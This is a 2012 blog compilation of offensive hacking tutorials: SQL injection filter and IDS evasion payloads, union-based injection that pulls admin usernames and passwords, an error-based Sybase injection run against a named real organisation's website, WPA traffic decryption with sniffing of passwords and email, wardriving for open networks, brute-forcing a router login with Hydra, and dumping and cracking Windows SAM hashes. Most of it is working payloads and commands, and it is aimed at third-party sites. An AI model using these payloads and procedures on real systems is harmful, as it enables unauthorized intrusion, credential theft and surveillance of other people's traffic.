Sunday, September 16, 2012

Windows Application Firewall bypassing and Intrusion Detection


Tutorial provided by


First of all what do you need?

* A vulnerable webstite. (error based)
* Text Editor to write down all filtered out options.

Part 1: WAF bypassing

+-- Short explenation.
+-- Comments we can use.
+-- Spliting, replacing keywords.
+-- Capitalization.
+-- Combining methode's.
+-- Using characters.
+-- Split the sql statement.
+-- Encoding characters.

Part 2: Intrusion detection.


WAF Bypassing

WAF, Web Application Firewall is an attempt from administratord to secure the network
but only with a filter we all know you can't do that 100%.

WAF bypassing is not that easy remember this
WAF bypassing is gambling
If the one word is filtered try another
Stay trying and combining until you get a hit

How does a WAF file look like?

Code:
/*
$_GET = array_map('trim', $_GET);
//$_POST = array_map('trim', $_POST);
$_COOKIE = array_map('trim', $_COOKIE);
$_REQUEST = array_map('trim', $_REQUEST);
if(get_magic_quotes_gpc()):
    $_GET = array_map('stripslashes', $_GET);
   //$_POST = array_map('stripslashes', $_POST);
    $_COOKIE = array_map('stripslashes', $_COOKIE);
    $_REQUEST = array_map('stripslashes', $_REQUEST);
endif;
$_GET = array_map('mysql_real_escape_string', $_GET);
$_POST = array_map('mysql_real_escape_string', $_POST);
$_COOKIE = array_map('mysql_real_escape_string', $_COOKIE);
$_REQUEST = array_map('mysql_real_escape_string', $_REQUEST);
*/
// END OF ANTI MYSQL INJECTION

/* Logging */

$locatie = $_SERVER['REQUEST_URI'];
$array = Array();
$array[] = "mysql";
$array[] = "query";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "<script>";
$array[] = "</script>";
$array = Array();
$array[] = "mysql";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "INSERT";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";

$array[] = "UPDATE";
$array[] = "COOKIE";

$array[] = "FILES";
$array[] = "POST";
$array[] = "REQUEST";
$array[] = "SERVER";
$array[] = "INSERT";
$array[] = "%40";
$array[] = "%20";
$array[] = "";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "WHERE";
$array[] = "VALUES";
$array[] = "SELECT";
$array[] = "FROM";
$array[] = "exit";
$array[] = "'";
$array[] = '"';
$array[] = ",";
$array[] = "`";
$array[] = "echo";

foreach($array As $posinject) {
if(eregi($posinject,$locatie)) {
$time = 'NOW()';

mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)
VALUES ('".ID."', '".$_SERVER[REMOTE_ADDR]."', '".$locatie."', '".$tijd."')") or die(mysql_error());

header("location: news.php");

exit();

}
}

This is a WAF PHP script
As you can see the filter out some important words and signs.
It logs IP 2. So it's important to be anonymous all the time.

Now the part comes where we need to bypass all of this.

WAF bypassing - comments we can use

First of all i would like you to have a look at these comments.
because these will bypass alot allready.
how do we do this, where do we use them and what do they exactly do.

Well let's start with /**/, (), #, --, +--+,--+-, -- -,,%20,/,//, < changing a . into, sometimes does the trick too.
/**/ this one is the most common to us.
it allows us to execute full words in our query without them being filtered out.
of course if the WAF has more then one filter this could get tricky.

Using comment in practice:

Code:
www.[site].com/index.php?id=-1+/*!union*/+select+1,2,3--+-

I get an error saying forbiden Somthing something ans whit the word select in it (if your lucky)
then i need to bypass the filter for select to

Code:
www.[site].com/index.php?id=-1+/*!union*/+/*!select*/+1,2,3--+-

but as you see in my WAF doc I am not that lucky
and I get redirected to news.php because the file says so

Let's try changing that with: +select+1,2,3--+-
Nope i got filtered out again.

WAF Bypassing - Spliting, replacing keywords

To go further where I ended before i am going to split the code instead of using the comments.

Code:
www.[site].com/index.php?id=-1+uni>on+sel>ect+1,2,3--+-

there will be cases this will work do not forget this one.
but not always.

There is another method called replacing the key words.

Code:
www.[site].com/index.php?id=-1+UNIunionON+SeLselectECT+1,2,3--+-

How does this work?
wel we all know the waf filteres out union and select.
look closely.
UNIunionON+ SELselectECT
he will filter out those 2 red words. 
when he did that we requested exactly the same word at the database.
the filter is not good enough to replace that one.
if your lucky of course.

Another simple option

WAF Bypassing - Capitalization

Some other easy method is simply capitalizing the sql query's.
for example instead of union UnIoN this could escape our waf easely. (in some cases)!

WAF Bypassing - Combining Methods

We can combine this with comments and other WAF bypass methods. example:

Code:
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCt+1,2,3--+-

Combining these could get you of radar fast. but this is all basic stuff people

You need to learn to combine as much as possible
without a brain you can't WAF Bypass

A full line getting tables could look like this
but it will probably get mutch worse

Code:
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCT+1,2,group_concat(/*!table_name*/)+FrOM+/*information_schema*/,TaBlEs+/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()- -

I also changed 2 other things here.
changing the . to a , as i said before could pass the waf radar.
and i changed the = at the end into like because it could also filter the = to something..

WAF Bypassing - using characters

By using a range of characters to bypass filter we could get true the waf.
following characters can do this:

Code:
[], ;, :, \/, $, €, |, ?, ", ', *, %, £ and lots more.

 and lots more.by using these characters in lots of cases union and select are not filtered. but the sign * is.
which means replacing the keywords would not work. as shown before in my tutorial.

We could do this instead:

Code:
www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3--+-

this is not mutch change from spliting the keywords.
only here the *¨sign is filtered out. so the union+select wil be complete as soon as it is filtered.

some others. when filtered out.
we could do (uni)(on)+(sel)(ect)
or using the quotes 'uni"on'+'sel"ect' this does not work whit MsSQL

WAF Bypassing - Split SQL statement

In some cases parts of the SQL statement are filtered out. for example union.
or the select

This means by splitting this and only using id=-1+union+1,2,3--+- or the other way arround.
we could bypass the filter.

WAF Bypassing - encoding characters

By encoding characters for example the '
or the white space.
you could geth true the waf because he dous not filter encoded characters.
IN MOST CASES THEY DO.
this is for when you get stuck i guess.

you could look for double encoding characters searching google. ill previeuw a fieuw here.

single quote ' %u0027
open ( = %u0028
close ) = %u0029
and a white space %u0020

single encoding is almost always filtered by the waf. so try double.

Now we should have covered the basics.
lets step over to Filter evasion.

PART 2: Intrusion Detection!

Intrusion detection systems disable us from doing or 1=1.
we need to bypass this intrusion detection in order to check vuln.

Example of an intrusion detection system.

Code:
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attack”;
flow: to_server, established; content: “' or 1=1 --”; nocase; sid: 1; rev:1;

This is of course the simpliest example i could give you.

This PHP code says:
alert when he gets this or 1=1 in his http server/ http ports so he displays a message: msg: "sql injection attack":
that's it. but they could filter out a lot more.

Let's take it easy
if the system sais. i cant do 1=1 
phuh why wont i do 2=2 that simple.
but since or and = could be filtered apart from the or 1=1
Let's do this
and 2 like 2
that should work.
of course security guy wont give up.

Like does not work. then do this 1 < 2 this means 1 is smaller then 2. database should return true.
unless it is filtered.

We could do 2 > 1 2 is bigger then 1. true.

This is so easy its like math.

Let's do: and 1230 - 1 like 1229
works too

Using unicode to encode your input may work too

You could use different encodings too

This does not need anymore explanation I guess

MsSQL Structured Query Language Injection



Tutorial provided by





The SQL Injection on ASP is same as on PHP...but a little bit of changes are made...

So first of all we will find some site that is vulnerable and is on .asp

So assume that u got a site with the name of

Code:
http://www.target.com/

Now find page where the site is vulnerable to SQL Injection...

You can check the vulnerability by adding single quotation ' 
at the end of URL like


Code:
http://www.target.com/product.asp?id=13'

If u get this error...


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.

/deptdet.asp, line 122

Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #

Code:
http://www.target.com/product.asp?id=13 order by 1#

Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...

So we will have an error on this query


Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error


Code:
http://www.target.com/product.asp?id=13 order by 10#

This tells us that the table has 10 columns

Now we will write the query as...


Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#

So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,

So to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10

In this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like:

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...

So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,

Now our URL will look like


Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#

Suppose we got a username instead of the number 3.

and then change column name with passwords column name
you will get the password ;)
URL will be like


Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#

Error-based Sybase Structured Query Language Injection


Tutorial provided by


So here we start with a site.. I'm assuming you understand MySQL Injection.


Put an ' at the end and you will see this

Sybase: Server message: Unclosed quote before the character string ' '

Version Extraction

Now to get the version:

Codehttp://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29--

So here it is:

Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006

Table Extraction

Now lets get some table names

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U'))--

Second table:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers'))--

Basically keep adding and name!='table name that you get

Here I guess I reach the end of the tables

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' andname!='boardMembers' and name!='events' and name!='galleries' and name!='galleries_photos' and name!='gallery' and name!='gallery_photos' andname!='newsletters' and name!='newsletters_new' and name!='newsreleases' and name!='offices' and name!='publication_import'and name!='publications' andname!='publications_new' and name!='radio' and name!='satellites' and name!='titles')) 

Time to get columns..We will get the columns of boardMembers.

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id= (select id from 

sysobjects where type='U' and name='gallery')))--

Column no.1:  city

Getting column 2:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery' ) and name!='city'))-- 

You get my point just add and name!='column name that you get.


Thanks for reading!

Wednesday, September 12, 2012

Analyzing / Monitoring network captures with dsniff


Tutorial provided by


If you readily have access to the network, be it open or encrypted with WEP or WPA, the capture files can show a lot of information on what the target network was up to.
The toolsuite dsniff, consists of dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf and webspy.

I'll be looking at:

urlsnarf shows the websites (urls) which were visited
driftnet can show pics of websites visited... (ooffff...)
dsniff can show passwords used in webforms
mailsnarf shows downloaded emails

Basically what we are doing is:

> capturing network traffic using airodump
> decrypting the network traffic using airdecap
> replaying the network traffic using tcpreplay
and using the above tools to check out the network session.

First stop is to identify our network that we want to monitor.

Code:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0


Locate the network, specify channel, bssid and output file.

Code:
airodump-ng mon0 -c 4 --bssid 00:11:22:33:44:55 -w wpa

As we are capturing from a WPA network, and want to decrypt lateron, a handshake needs to be in the capture file.
(The packets will only be decrypted as from the moment the handshake is obtained) 
So after starting the airodump capture, start a new console and deauth a user forcing that user to reconnect ensuring the handshake will be in the capture file ;
(Here i did the deauth attack twice just to be sure the capture would be included)

Code:
aireplay-ng mon0 -0 -5 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00


In airodump we will see the handshake captured in the top right of the screen.


Now we (the target PC) happily browse away and after a while stop the airodump capture.

To decrypt the WPA capture file, we will use airdecap-ng.
Tto correctly decrypt we need the network ESSID, the capture file with handshake and the WPA passphrase.

Code:
airdecap-ng -e ESSID -p 'wpa_password' wpa-01.cap


If successfull, you will see x amount of packages decrypted and there will be a new file; wpa-01-dec.cap
This is the decrypted cap file. 

Now to see what results we were able to obtain !

Open a new console and startup urlsnarf, specifying the local interface:

Code:
urlsnarf -i lo

To replay the network session, we use tcpreplay on the local interface using the decrypted file:

Code:
tcpreplay -i lo wpa-01-dec.cap

In the console running urlsnarf you will see details coming by of the websites visited.

To speed up the replay, you can use the -t option to go as fast as is possible.

Code:
tcpreplay -i lo -t wpa-01-dec.cap

When the replay is completed it simply stops and you can close the close the other consoles after checking what you wanted to check.


You can run the tools together ;
Open up seperate consoles for each tool, again specifying the local interface.

Code:
dsniff -i lo

Code:
mailsnarf -i lo

Code:
driftnet -i lo

(driftnet opens up a seperate driftnet window showing the pictures)

Then when those are up, open a console and run tcpreplay -i lo wpa-01-dec.cap.

After visiting several sites, entering passwords to sites, checking my email on Outlook Express, checking several semi-decent sites ... *cough* ... my results were ;

urlsnarf 
works well in showing the urls visited, nothing to remark on there. 
Below the results of checking out one of UK's "finest" newspapers...


driftnet 
Did not show the amount of pics I was expecting to see.. but does show quite a few, it depends on the sort of sites visited, will need to do some more checking on this one.
Below he result of browsing through said newspaper in the driftnet window.. What class.. !
If NSFW.. emigrate.. ;)


dsniff 
Only worked on 1 out 5 passworded sites I tried, not too impressed, but quite relieved to be honest !
The results from a browser game I am into:


mailsnarf 
sometimes showed emails I downloaded from Outlook Express, sometimes didn't.
When I had several mails it showed them, when I only 1 to download, it didnt, part of a result of the time it did work:


All in all not a flawless result, but definately interesting and entertaining !.

As yet I have been unable to get webspy working using tcpreplay, a shame as webspy is reportedly able to
show realtime internet use in a browser window, which I had hoped would be able to be done using tcpreplay as well.

Network mapping with Kismet-newcore + giskismet


Tutorial provided by



First make a quick edit to the kismet.conf file, we can do this with nano:

Code:
nano /pentest/wireless/kismet-newcore/conf/kismet.conf


Just edit to make sure the GPS device is pointing correctly to ttyUSB0.

Ctrl + X (to close after amending)
Y (Yes to save)
Enter (to save as same file name)

Then start up GPSD and we're good to go.

Code:
gpsd /dev/ttyUSB0

So with the Kismet-Newcore and GPS set to work, it was war-driving time !

So starting up kismet with the GPS:


In kismet going to Windows --> GPS Info


All is well, now just time to hop in the car and drive around a little !

When done, just exit kismet.

Now we can use giskismet, first inserting all information into a GISKismet database file from which we can create .kml files to put in either google maps or google earth.

So in the directory where the kismet files are;

Code:
giskismet -x kismet_netxml_file.netxml


wireless.dbl will be created, then we can make some .kml files depending on what we want to see.

Code:
giskismet -q "select * from wireless" -o output_all.kml

The .kml file will be created in that same directory with all information on all access points seen and can then be opened with google earth.


If for instance only want to show AP's with an ESSID "linksys":

Code:
giskismet -q "select * from wireless where ESSID='linksys'" -o linksys.kml


Resulting .kml in Google Earth:


Showing only AP's without any encryption:

Code:
giskismet -q "select * from wireless where Encryption='None'" -o None.kml


Showing only AP's with WEP encryption:

Code:
giskismet -q "select * from wireless where Encryption='WEP'" -o WEP.kml

You can actually filter the input to this database on channel / essid / bssid or encryption.


For instance:

Code:
giskismet -x kismet_netxml_file.netxml --channel 1 --encryption None

then

Code:
giskismet -q "select * from wireless" -o output.kml

This will give you a .kml file directly with only networks shown which are on channel 1 without encryption.

Resulting .kml in Google Earth:


The amount of networks you see with either no encryption or WEP is really staggering..

Still trying to figure out how best to grep out the SSIDs for entering in my essid list for cracking hidden essids.
Wrote a bit of code that the blog wouldnt even let me post, so must be rough ! Will be reverting on that..

So got some help.. thanks Gitsnik !

Still quite a mouthful, but gets the job done, am pleased to say that what I had, although ugly, actually worked as well ;)

Code:
grep SSID kismet-nettxt-file.nettxt | egrep -v 'BSSID|SSID [0-9]' | sed 's/.*://' | sed 's/"//' | sed 's/"//' | sort -f | uniq > ssid.txt

Still not 100% perfect, but I'm sure I will be able to 'prettify' (omg) it after some further resting, testing and trials.

So after some trial and error, and not a little help from Gitsnik:

Code:
grep SSID test.nettxt | egrep -v 'BSSID|SSID [0-9]' | cut -c 18- | sed 's/"//g' | sed 's/ *$//g' | sort -fu > ssid.txt

Seems to be pretty clean so far !


To make things a little easier on stripping out the SSIDs, made a couple of scripts which I thought
I would share for the hell of it:

SSIDstrip_v0.1


ssidstrip_v0.1 can be downloaded here:


Or if you like a bit more to look at (and with some more safety built in to avoid accidental overwriting etc.)
SSIDstrip_v0.2
ssidstrip_v0.2 can be downloaded here:

Using Hydra after connecting to network


Tutorial provided by


After gaining access to your network, you can check the strength of your router's access passwords by using a tool called Hydra from THC.
Hydra is a login / password bruteforce cracker which uses password/dictionary files.

First we find our network and do what is needed to log in
In this case my test setup is:

* Eee PC 900, using the built in Atheros wireless.
* Open network with hidden SSID on channel 3, no clients attached, no mac filtering enabled.

Code:airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0 -f 1500 -t OPN -a

(using the -f function to slow down the channel hopping and -t option to filter out open networks)



After finding the network and relevant info with airodump, I'll use my custom ssid wordlist to crack the hidden ssid:

Code:
mdk3 ath0 p -c 2 -t 00:13:D4:09:32:60 -f /mnt/sda1/ssid.txt -s 50

Depending on how often the AP sends beacons it can take a while to start, it will also show other networks broadcasting.


So now we have all the info we need to connect to this open network.
We start by stopping the wireless interface which is now still in monitor mode and
recreate in managed mode and then enter in the information we have acquired to access network and check for success:

Code:
airmon-ng stop ath0
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 channel 2 essid TEST ap 00:13:D4:09:32:60
ifconfig ath0 up
iwconfig ath0


Success ! (see link quality? we have a connection!)

Now to see whether the AP has DHCP enabled so we can automatically get an IP address using dhcpcd with the -t option to give a time limit and the -d to give some extra info on our MAC and IP address when given.
When successful we can do a netstat to see what IP address the router is using (gateway):

Code:
dhcpcd -t 30 -d ath0
netstat -nr


So now we know that the router can be found on IP address 192.168.200.1, lets try to log in using some standard password combinations..


No luck..


OK, so now we will attempt to use Hydra.
Note the address line in the browser; http://192.168.200.1/index.asp
I have wordlists stored on my sda1 drive which have been prepared using a combination of default passwords and regularly used ones.

Code:
hydra 192.168.200.1 -L /mnt/sda1/login.txt -P /mnt/sda1/password.txt -t 2 -e ns -f http-get /index.asp

This can take a while, and so to speed things up I tweaked my custom wordlist a bit.


Success !

So now using the above found working login and password, we try to login again:


We're in !


So now we are in the router and can make changes as we see fit !
And make sure that the security is increased..

Cracking Windows login passwords

Cracking Windows login passwords

Mkay, let's check out the whole philosophy around windows logins.

Scenario is that you do not have access to windows, you need the login and password.
(and thus of course a 2nd pc to do the cracking.

The tools used were:

* BackTrack 3 Final live-usb
[www.remote-exploit.org]
* Ophcrack (using the XP special rainbow tables)
[www.ophcrack.sourceforge.net]

The hack / crack is based on having physical access to the machine in question, and assuming it is running Windows XP.
Basically the sequence of events is as follows -->
* Booting up with the BackTrack live-usb/cd;
* Copy the files from the windows system with logins and passwords and keys to extract them;
* Extract the hashes from the SAM file;
* Crack the hashes using OPHcrack

After booting up BT3 and opening up a shell type the 'df' command to see which drives are mounted:

Code:
df

In this case sda1 and sda2 are on the laptop, the sda2 partition has Windows on it.
sdb1 is my flashdrive running BT3 and sdc is my extra flashdrive for saving the password hashes later as I will crack these on my other PC.


Now to head over to the directory in the Windows partition to find and copy the files we need to work with, which are the SAM file and the SYSTEM file.

Code:
cd /mnt/sda2/WINDOWS/system32/config/
ls


Now to copy the SAM and SYSTEM file to the flashdrive.


Code:
cp SAM /mnt/sdc/
cp SYSTEM /mnt/sdc/


Now we have the the files we need, we switch to the folder where we copied the files and use the tool 'bkhive' to extract the information necessary to dump the hashes from the SAM file.

Code:
cd /mnt/sdc/
bkhive system key

Now we can use the key to dump the hashes from the SAM file using the tool 'samdump2'.

Code:
samdump2 sam key

to copy the hashes to a text file for cracking later;

Code:
samdump2 sam key > /mnt/sdc/hashes.txt


So now we have a list of users and the hashes for their passwords in the file 'hashes.txt'.


PART 2: Cracking the one-way hashing algorithms with Ophcrack

Ophcrack is a free windows password cracker that uses rainbow tables (pre-computed password hashes) it can be run off a live-cd as well, however I found the actual installed program to better fit my purpose.

There are a couple of free rainbow tables free for download, these will normally grab the easy passwords, however I had the most success with the the 'XP special' rainbow tables.
These included more characters and although it obviously takes longer to crunch the numbers, the results are fantastic.

So, assuming Ophcrack is installed on your system and that you have downloaded at least the 'XP free small' and the 'XP free fast' tables ;

Fire up Ophcrack, click on the 'Tables' icon and install the tables by browsing to the directory where they are located. Click OK and the screen should look something like the below.


Next click on the 'Load' icon and choose the 'PWDUMP file' and browse to your 'hashes.txt' file that was made in the previous step with BT3.

Then click on the 'Crack' icon and let Ophcrack do its thing. It is a CPU intensive process and took my lowly PC over 4min to complete..

Without success using the XP free fast tables..


So there you have it, the longest part of doing the above will be the downloading of the tools and tables ;)

An optimized way to do the above is to get an 8Gig thumb drive (the XP special tables are over 7Gig, whereas the tables included on the Ophcrack live-cd are under 400mb and contain a lot less possible passwords), make it a bootable Ophcrack usb drive and replace the tables in the Opcrack/tables directory with the XP special tables.
Doing this enabled me to do the above in one step by booting into the system with the Opcrack live-usb and carry out the windows password cracks directly.
This reduced the time necessary to do the above down to under 11 min !
(This in no small part due to amount of RAM, my desktop only has 2gig whereas my laptop has 3gig RAM, the more, the merrier).

Code:
edit

Well goes to show that research is still your best friend !

There is an Ophcrack module available ophcrack-3.0.lzm which can be downloaded from http://benjy-blog.blogspot.com/2008/08/usb-windows-password-cracker-tuto.html and then placed in your BackTrack3, modules folder.

This way if you have a large flashdrive, you can boot in BT3, run the ophcrack module, point to your rainbow tables, and off you go !

Assuming you have downloaded the above ophcrack module and have correctly placed in your modules folder, proceed as follows;

> Boot up in BT3F
> Open a shell and type ophcrack for options:

Code:
ophcrack


Then type in:

Code:
ophcrack -g -d /mnt/sdb1/OPHcrack/ -t /mnt/sdb1/OPHcrack/XP_Special/ -w /mnt/sda2/WINDOWS/system32/config/

(In my case the tables are in a folder called OPHcrack on my usb drive from which BT is running, and windows is on my sda2, really though just follow the code instructions as above and you can't go wrong, but remember that the path is case sensitive !)


So as you can see the whole process for the cracking took about 19 minutes to chunk through around 7gigs worth of tables.